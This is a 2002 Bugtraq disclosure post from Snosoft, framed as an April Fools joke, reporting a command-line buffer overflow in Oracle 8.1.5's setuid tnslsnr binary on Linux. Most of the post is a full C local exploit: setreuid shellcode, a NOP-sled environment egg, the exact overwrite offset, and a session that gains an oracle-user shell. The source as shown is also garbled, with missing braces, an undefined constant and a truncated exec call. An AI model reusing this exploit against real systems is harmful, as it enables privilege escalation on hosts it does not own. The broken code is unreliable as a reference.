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Happy Easter / April Fools from Snosoft (Oracle 8.1.5 tnslsnr)

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Date: Mon, 01 Apr 2002 10:22:43 -0500
From: KF <[email protected]>
To: bugtraq <[email protected]>,
Subject: Happy Easter / April Fools from Snosoft    (Oracle 8.1.5 tnslsnr)

Content-Type: text/plain; charset=us-ascii; format=flowed
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This is ment to be an April fools joke but if you still use old Oracle 
its not to funny I guess:

After I ate a few too many hard boiled eggs this weekend I decided to 
install Oracle and play with it a little. Being poor I didn't have 800 
bones to shell out on Oracle 16i so I had to settle with oldschool 
Oracle 8i from this little mom and pop shop on my corner. They just 
happened to have a copy that would run on linux and it was only 50 bucks 
so I bought it! After the install no more than 10 minutes later I found 
an issue... I figured that most anything I would have found would 
already be public knowlege or it was patched up somewhere along the way 
to the current product version. Well from what I can tell this is an 
unknown issue.

TNSLSNR for Linux: Version - Production on 01-APR-02 11:46:53

[itchie@ghetto itchie]$ ls -al 
-rwsr-s--x    1 oracle   oracle    4399723 Jun 11  1999 

There were holes reported on the abuse of $ORACLE_HOME....
which tnslsnr had issues with but these appeared patched on this install 
so I didn't bother trying to use env variables as abuse

[dotslash@ghetto itchie]$ export ORACLE_HOME=`perl -e 'print "A" x 9000'`
[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
(no result...exit normally)

The first thing abnormal I tried hit right on the money... simple 
cmdline b0f
[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr 
`perl -e 'print "A" x 9000'`
Segmentation fault

Of course I had to give one of my developers a quick ring and try to 
harass him to stop molesting the eater bunny and take a second to code 
me up an exploit. Much obliged "The Itch" took about 10 minutes 
(literally) to come up with the following...

Happy Easter! and April Fools?!

[itchie@ghetto tmp]$ cc -o tnslsnrx tnslsnrx.c
[itchie@ghetto tmp]$ id
uid=507(itchie) gid=507(itchie) groups=507(itchie)
[itchie@ghetto tmp]$ ./tnslsnrx
Oracle tnslsrn 8.1.5
Vulnerability found by KF /
Coded by The Itch /

Using return address: 0xbffffaf4
Using buffersize    : 2132
sh-2.05$ id
uid=515(oracle) gid=507(itchie) groups=507(itchie)


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 * Yet another exploit for the 'Unbreakable' Oracle database
 * The vulnerability was found by KF / Snosoft (
 * Shellcode created by r0z / Promisc
 * Exploit coded up by The Itch / Promisc (
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail [email protected] if you wish to participate in vuln research. 
 * - The Itch
 * - [email protected]
 * - Technical details concerning the exploit -
 * 1). Buffer overflow occurs after writing more then 2132 bytes into the
 *     buffer at the command line 2128 to overwrite ebp, 2132 to
 *     overwrite eip).
 * 2). If you write more then 2132 bytes, other frames will be
 *     overwritten afterwards and will mess up your flow of arbitrary code
 *     execution. (It must be exactly 2132 bytes!)
 * 3). shellcode will try to do a setreuid(515);

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_EGG_SIZE 4096
#define NOP 0x90

/* 2132 + 1 for the \0 at the end of the string */

/* Shellcode made by r0z ([email protected]) */
char shellcode[] =
         "\x31\xdb"              /* xor   %ebx, %ebx     */
         "\x31\xc9"              /* xor   %ecx, %ecx     */
         "\xf7\xe3"              /* mul   %ebx           */
         "\xb0\x46"              /* mov   $0x46, %al     */
         "\x66\xbb\x03\x02"      /* mov   $0x1fc, %bx    */
         "\x49"                  /* dec   %ecx           */
         "\xcd\x80"              /* int   $0x80          */
         "\x31\xd2"              /* xor   %edx, %edx     */
         "\x52"                  /* push  %edx           */
         "\x68\x6e\x2f\x73\x68"  /* push  $0x68732f6e    */
         "\x68\x2f\x2f\x62\x69"  /* push  $0x69622f2f    */
         "\x89\xe3"              /* mov   %esp, %ebx     */
         "\x52"                  /* push  %edx           */
         "\x53"                  /* push  %ebx           */
         "\x89\xe1"              /* mov   %esp, %ecx     */
         "\x6a\x0b"              /* pushl $0xb           */
         "\x58"                  /* pop   %eax           */
         "\xcd\x80";             /* int   $0x80          */

int main(int argc, char *argv[])
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        int get_sp = (int)&get_sp;

        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
                printf("unable to allocate memory for %d bytes\n", bsize);

        if(!(egg = malloc(eggsize)))
                printf("unable to allocate memory for %d bytes\n", eggsize);

        printf("Oracle tnslsrn 8.1.5\n");
        printf("Vulnerability found by KF /\n");
        printf("Coded by The Itch /\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize    : %d\n", bsize - 1);

        ptr = buff;
        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode)-1; i++)
                *(ptr++) = NOP;

        for(i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];

        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
        buff[bsize - 1 ]= '\0';
              "tnslsnr", buff, 0);
        return 0;


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